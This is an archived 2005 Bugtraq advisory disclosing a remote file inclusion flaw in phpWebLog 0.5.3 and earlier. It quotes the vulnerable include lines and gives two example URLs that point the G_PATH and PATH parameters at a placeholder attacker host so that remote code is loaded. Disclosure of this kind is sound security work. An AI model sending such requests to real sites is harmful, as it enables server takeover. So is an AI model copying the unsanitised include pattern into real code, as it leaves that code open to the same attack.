lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050307192126.23159.qmail@www.securityfocus.com>
Date: 7 Mar 2005 19:21:26 -0000
From: Filip Groszynski <groszynskif@...il.com>
To: bugtraq@...urityfocus.com
Subject: phpWebLog <= 0.5.3 arbitrary file inclusion (VXSfx)




-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name:       phpWebLog
Version:    <= 0.5.3
Homepage:   http://phpweblog.org/

Author:     Filip Groszynski   (VXSfx)
Date:       7 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in include/init.inc.php:
 
...
# Allowed HTML tags in stories, comma seperated
$G_HTML         = "<a>,<i>,<b>,<u>,<li>,<p>,<code>,<tt>,<blockquote>";

# Are we developing?
$G_DEBUG        = false;

# Number of seconds to hold cache
$G_CACHE        = 10;

# phpWebLog version
$G_VER          = "0.5.3";

...
/*== include libraries/functions =========================================*/

include_once("$G_PATH/include/func.inc.php");
include_once("$G_PATH/include/cache.inc.php");
include_once("$G_PATH/include/blocks.inc.php");
include_once("$G_PATH/include/layout.inc.php");
include_once("$G_PATH/include/parser.inc.php");
include_once("$G_PATH/include/search.inc.php");
include_once("$G_PATH/include/comments.inc.php");
....

--------------------------------------------------------

Vulnerable code in backend/addons/links/index.php:

# Original links code written by Twyst (http://anime-central.net)
# Modified for use with phpWebLog by Jason Hines
# Thanks Twyst!

include_once($PATH . "/functions.php");
....

--------------------------------------------------------

Example:

  if register_globals=on and allow_url_fopen=on:
    http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
    http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/

--------------------------------------------------------

Vendor status:

  Vendor has been notified.
  
--------------------------------------------------------

Contact:

    Author:    Filip Groszynski   (VXSfx)
    Location:  Poland <Warsaw>
    Email:     groszynskif <at> gmail <dot> com
    HP:        http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ